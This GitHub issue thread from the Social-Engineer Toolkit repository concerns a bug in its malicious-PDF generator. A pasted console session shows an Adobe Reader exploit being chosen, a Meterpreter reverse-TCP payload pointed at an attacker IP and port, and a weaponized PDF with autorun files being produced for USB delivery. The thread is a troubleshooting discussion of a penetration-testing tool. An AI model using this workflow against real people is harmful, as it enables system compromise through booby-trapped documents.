trustedsec / social-engineer-toolkit

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

Malicious PDF not generating #214

Closed andranik-sahakyan closed 8 years ago

andranik-sahakyan commented 8 years ago

The malicious PDF in the Infectious Media Generator never works and it just says "generating" forever.

trustedsec commented 8 years ago

This was fixed several versions ago. Which version of SET are you using?

andranik-sahakyan commented 8 years ago

I am on the latest version of SET, it still doesn't work.


trustedsec commented 8 years ago

On the latest rolling and 7.0.3 I'm unable to reproduce this with a fresh Kali. Can you paste the output and options you are specifying?

trustedsec commented 8 years ago

I'm still unable to reproduce this on Kali:

```text
set:infectious>1
set:infectious> IP address for the reverse connection (payload):10.10.10.10
/pentest/exploitation/metasploit/

Select the file format exploit you want. The default is the PDF embedded EXE.

       ********** PAYLOADS **********

   1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>21

   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address for the payload listener (LHOST): 10.10.10.10
set:payloads> Port to connect back on [443]:443
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete...
[*] Waiting for payload generation to complete...
[*] Waiting for payload generation to complete...
[*] Waiting for payload generation to complete...
[*] Waiting for payload generation to complete...
[*] Waiting for payload generation to complete...
[*] Waiting for payload generation to complete...
[*] Payload creation complete.
[*] All payloads get sent to the template.pdf directory
[*] Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the contents of the folder to a CD/DVD/USB to autorun
set> Create a listener right now [yes|no]:
```

andranik-sahakyan commented 8 years ago

I was using #13, the Adobe PDF Embedded EXE, maybe that’s why.


andranik-sahakyan commented 8 years ago

I tried the same configuration as this and it is still continuing with the “Waiting for payload generation to complete” message.
